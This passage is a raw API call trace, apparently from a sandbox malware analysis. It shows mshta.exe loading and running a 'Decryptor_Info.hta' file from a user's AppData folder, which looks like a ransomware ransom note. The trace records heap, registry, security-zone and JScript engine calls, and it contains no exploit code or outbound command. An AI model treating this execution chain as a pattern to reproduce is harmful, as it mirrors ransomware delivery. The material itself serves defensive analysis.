dwFlags=0x0, lpMem=0x4922f0 | out: hHeap=0x450000) returned 1 [0110.878] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4922c0 | out: hHeap=0x450000) returned 1 [0110.878] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0110.878] GetMessageTime () returned 0 [0110.878] GetMessagePos () returned 0x0 [0110.878] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x22f164 | out: plResult=0x22f164) returned 0x0 [0110.878] GetCurrentThreadId () returned 0xe9c [0110.879] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0110.879] GetMessageTime () returned 0 [0110.879] GetMessagePos () returned 0x0 [0110.879] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x22f164 | out: plResult=0x22f164) returned 0x0 [0110.879] GetCurrentThreadId () returned 0xe9c [0110.879] IsOS (dwOS=0x25) returned 1 [0110.879] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22f370 | out: phkResult=0x22f370*=0x22c) returned 0x0 [0110.880] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22f374 | out: phkResult=0x22f374*=0x230) returned 0x0 [0110.880] RegOpenKeyExW (in: hKey=0x230, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x22f330 | out: phkResult=0x22f330*=0x0) returned 0x2 [0110.880] RegOpenKeyExW (in: hKey=0x22c, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x22f330 | out: phkResult=0x22f330*=0x234) returned 0x0 [0110.880] SHRegGetValueW () returned 0x0 [0110.880] RegCloseKey (hKey=0x234) returned 0x0 [0110.880] RegCloseKey (hKey=0x0) returned 0x6 [0110.880] RegCloseKey (hKey=0x0) returned 0x6 [0110.880] RegCloseKey (hKey=0x22c) returned 0x0 [0110.880] RegCloseKey (hKey=0x230) returned 0x0 [0110.880] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73150000 [0110.890] GetVersionExW (in: lpVersionInformation=0x22ee7c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22ee7c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0110.890] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73150000 [0110.890] LoadStringW (in: hInstance=0x73150000, uID=0xb5, lpBuffer=0x22f3f8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0110.893] LoadStringW (in: hInstance=0x73150000, uID=0xb5, lpBuffer=0x22f458, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0110.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4922c0 [0110.893] LoadStringW (in: hInstance=0x73150000, uID=0xb5, lpBuffer=0x22f444, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0110.893] ShowWindow (hWnd=0x201f2, nCmdShow=1) returned 1 [0110.893] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b520 | out: hHeap=0x450000) returned 1 [0110.893] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0110.894] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0110.894] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0110.894] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x22de2c | out: ppURI=0x22de2c*=0x47c5c4) returned 0x0 [0110.894] IUnknown:QueryInterface (in: This=0x47c5c4, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22de04 | out: ppvObject=0x22de04*=0x47c5c4) returned 0x0 [0110.895] IUnknown:Release (This=0x47c5c4) returned 0x4 [0110.895] IUnknown:AddRef (This=0x47c5c4) returned 0x5 [0110.895] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x96) returned 0x4bad98 [0110.895] IUnknown:Release (This=0x47c5c4) returned 0x4 [0110.895] IUnknown:Release (This=0x47c5c4) returned 0x3 [0110.895] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x100) returned 0x4bcd80 [0110.895] FindResourceW (hModule=0x73150000, lpName=0x1fe, lpType=0x6) returned 0x2d084d0 [0110.895] LoadResource (hModule=0x73150000, hResInfo=0x2d084d0) returned 0x2d2e53c [0110.895] LockResource (hResData=0x2d2e53c) returned 0x2d2e53c [0110.895] VirtualQuery (in: lpAddress=0x2d2e53c, lpBuffer=0x22efd4, dwLength=0x1c | out: lpBuffer=0x22efd4*(BaseAddress=0x2d2e000, AllocationBase=0x2a50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0110.896] SizeofResource (hModule=0x73150000, hResInfo=0x2d084d0) returned 0xe6 [0110.896] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bad98 | out: hHeap=0x450000) returned 1 [0110.896] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4bcd80, Size=0xb4) returned 0x4bcd80 [0110.896] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xb8) returned 0x4b6d40 [0110.898] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f190 | out: ppu=0x22f190) returned 0x0 [0110.898] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.898] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.898] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.898] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x4922f0 [0110.898] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x495a28 [0110.898] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6) returned 0x4a6ff0 [0110.898] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab378 [0110.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x4908b8 [0110.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b520 [0110.899] SetTimer (hWnd=0x201f2, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0110.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490910 [0110.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490910 | out: hHeap=0x450000) returned 1 [0110.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.899] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0110.899] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22f09c, dwFlags=0x0 | out: pdwZone=0x22f09c*=0xffffffff) returned 0x800c0011 [0110.899] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.899] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.899] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0110.899] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x2106, pPolicy=0x22f0a0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x22f0a0*=0x0) returned 0x0 [0110.899] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.900] IUnknown:Release (This=0x47c5c4) returned 0x3 [0110.900] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b520 | out: hHeap=0x450000) returned 1 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x492320 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490910 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b520 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x68) returned 0x4bce40 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d888 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490968 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x5c) returned 0x4a98a0 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4909c0 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x6c) returned 0x4bceb0 [0110.900] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x108) returned 0x4bcf28 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.901] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490a18 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a18 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.901] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490a18 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a18 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b520 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcf28 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bceb0 | out: hHeap=0x450000) returned 1 [0110.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.901] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2) returned 0x4a7000 [0110.901] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6) returned 0x4a7010 [0110.901] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f1f0 | out: lpPoint=0x22f1f0) returned 1 [0110.901] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4aa958 [0110.902] GetCurrentThreadId () returned 0xe9c [0110.902] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aa958 | out: hHeap=0x450000) returned 1 [0110.902] GetCurrentThreadId () returned 0xe9c [0110.902] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a7000 | out: hHeap=0x450000) returned 1 [0110.902] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4909c0 | out: hHeap=0x450000) returned 1 [0110.902] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a98a0 | out: hHeap=0x450000) returned 1 [0110.902] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x68) returned 0x4bceb0 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bcf38 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4ba548 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab3c0 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x4909c0 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b520 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490a18 [0110.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x4bd720 [0110.903] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2d0) returned 0x4bdf28 [0110.903] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.903] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490a70 [0110.903] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a70 | out: hHeap=0x450000) returned 1 [0110.903] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0110.903] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ac4a0, Size=0x6c) returned 0x4be200 [0110.904] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f2d8 | out: ppu=0x22f2d8) returned 0x0 [0110.904] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0110.904] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22f27c, dwFlags=0x0 | out: pdwZone=0x22f27c*=0xffffffff) returned 0x800c0011 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0110.904] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x1400, pPolicy=0x22f280, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x22f280*=0x0) returned 0x0 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.904] IUnknown:Release (This=0x47c5c4) returned 0x3 [0110.904] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b520 | out: hHeap=0x450000) returned 1 [0110.904] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f294 | out: ppu=0x22f294) returned 0x0 [0110.904] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0110.904] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22f234, dwFlags=0x0 | out: pdwZone=0x22f234*=0xffffffff) returned 0x800c0011 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.904] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0110.905] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x1400, pPolicy=0x22f238, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x22f238*=0x0) returned 0x0 [0110.905] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.905] IUnknown:Release (This=0x47c5c4) returned 0x3 [0110.905] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f224 | out: ppu=0x22f224) returned 0x0 [0110.905] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0110.905] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22f1c4, dwFlags=0x0 | out: pdwZone=0x22f1c4*=0xffffffff) returned 0x800c0011 [0110.905] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.905] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.905] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0110.905] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x1400, pPolicy=0x22f1c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x22f1c8*=0x0) returned 0x0 [0110.905] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0110.905] IUnknown:Release (This=0x47c5c4) returned 0x3 [0110.905] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/", cchCount1=5, lpString2="text/javascript", cchCount2=5) returned 2 [0110.905] CoCreateInstance (in: rclsid=0x22f214*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73d295b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x22f1d0 | out: ppv=0x22f1d0*=0x2590488) returned 0x0 [0112.829] malloc (_Size=0x80) returned 0xfd880 [0112.829] GetVersion () returned 0x1db10106 [0112.829] __dllonexit () returned 0x74fa7ecf [0112.830] __dllonexit () returned 0x74fa7e9b [0112.830] __dllonexit () returned 0x74fa7eb5 [0112.830] __dllonexit () returned 0x74fa7f70 [0112.832] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0112.833] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0112.833] EtwRegisterTraceGuidsA () returned 0x0 [0112.833] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0112.833] EtwRegisterTraceGuidsA () returned 0x0 [0112.833] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22db84, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0112.834] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0112.835] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x22dca8 | out: phkResult=0x22dca8*=0x0) returned 0x2 [0112.842] GetVersion () returned 0x1db10106 [0112.842] DllGetClassObject (in: rclsid=0x47fa6c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22e494 | out: ppv=0x22e494*=0xffe00) returned 0x0 [0112.842] ??2@YAPAXI@Z () returned 0xffe00 [0112.842] JScriptEngine5:IClassFactory:CreateInstance (in: This=0xffe00, pUnkOuter=0x0, riid=0x22ee40*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x22e480 | out: ppvObject=0x22e480*=0x2590488) returned 0x0 [0112.842] ??2@YAPAXI@Z () returned 0x2590488 [0112.842] GetUserDefaultLCID () returned 0x409 [0112.842] GetACP () returned 0x4e4 [0112.843] JScriptEngine5:IUnknown:AddRef (This=0x2590488) returned 0x2 [0112.843] JScriptEngine5:IUnknown:Release (This=0x2590488) returned 0x1 [0112.843] JScriptEngine5:IUnknown:Release (This=0xffe00) returned 0x0 [0112.843] ??3@YAXPAX@Z () returned 0x1 [0112.843] JScriptEngine5:IUnknown:QueryInterface (in: This=0x2590488, riid=0x73d295b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x22f174 | out: ppvObject=0x22f174*=0x2590488) returned 0x0 [0112.843] JScriptEngine5:IUnknown:Release (This=0x2590488) returned 0x1 [0112.843] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0112.843] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22f0e4, dwFlags=0x0 | out: pdwZone=0x22f0e4*=0xffffffff) returned 0x800c0011 [0112.844] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0112.844] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0112.844] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0112.844] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x1401, pPolicy=0x22f0e8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x22f0e8*=0x0) returned 0x0 [0112.844] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0112.844] IUnknown:Release (This=0x47c5c4) returned 0x3 [0112.846] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x54) returned 0x4a7970 [0112.846] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9ec0 [0112.846] GetCurrentThreadId () returned 0xe9c [0112.846] ??2@YAPAXI@Z () returned 0xffe00 [0112.846] GetCurrentThreadId () returned 0xe9c [0112.847] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f010 | out: phkResult=0x22f010*=0x254) returned 0x0 [0112.847] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0112.847] RegQueryValueExA (in: hKey=0x254, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x22f004, lpData=0x22f008, lpcbData=0x22f00c*=0x4 | out: lpType=0x22f004*=0x4, lpData=0x22f008*=0x1, lpcbData=0x22f00c*=0x4) returned 0x0 [0112.847] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0112.848] RegCloseKey (hKey=0x254) returned 0x0 [0112.848] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0112.848] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0112.848] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0112.848] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0112.848] CoCreateInstance (in: rclsid=0x74f923a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74f923b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22f00c | out: ppv=0x22f00c*=0x76766460) returned 0x0 [0112.849] ??2@YAPAXI@Z () returned 0xffe38 [0112.849] ??_U@YAPAXI@Z () returned 0xf13c0 [0112.849] ??2@YAPAXI@Z () returned 0xffec8 [0112.849] ??2@YAPAXI@Z () returned 0x25906a0 [0112.850] ??2@YAPAXI@Z () returned 0xfff00 [0112.850] GetCurrentThreadId () returned 0xe9c [0112.850] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x22efb0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0112.850] GetCurrentThreadId () returned 0xe9c [0112.850] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0112.850] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x22f020, cchData=6 | out: lpLCData="1252") returned 5 [0112.851] IsValidCodePage (CodePage=0x4e4) returned 1 [0112.851] GetCurrentThreadId () returned 0xe9c [0112.851] GetCurrentThreadId () returned 0xe9c [0112.851] CoCreateInstance (in: rclsid=0x74f915ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74f915fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2590674 | out: ppv=0x2590674*=0x4ab4e0) returned 0x0 [0112.851] IUnknown:AddRef (This=0x4ab4e0) returned 0x2 [0112.851] GetCurrentProcessId () returned 0xe98 [0112.851] GetCurrentThreadId () returned 0xe9c [0112.851] GetTickCount () returned 0x1151ec7 [0112.851] ISystemDebugEventFire:BeginSession (This=0x4ab4e0, guidSourceID=0x74f916d4, strSessionName="JScript:00003736:00003740:18161351") returned 0x0 [0112.852] GetCurrentThreadId () returned 0xe9c [0112.852] GetCurrentThreadId () returned 0xe9c [0112.852] ??2@YAPAXI@Z () returned 0xfff68 [0112.854] GetCurrentThreadId () returned 0xe9c [0112.854] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0112.854] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x4bcf58 [0112.854] CoGetObjectContext (in: riid=0x74f90270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ef7c | out: ppv=0x22ef7c*=0x477200) returned 0x0 [0112.854] ??2@YAPAXI@Z () returned 0xfffa0 [0112.855] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0xfffa0, riid=0x74f95710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0xfffbc | out: pdwCookie=0xfffbc*=0x100) returned 0x0 [0112.855] 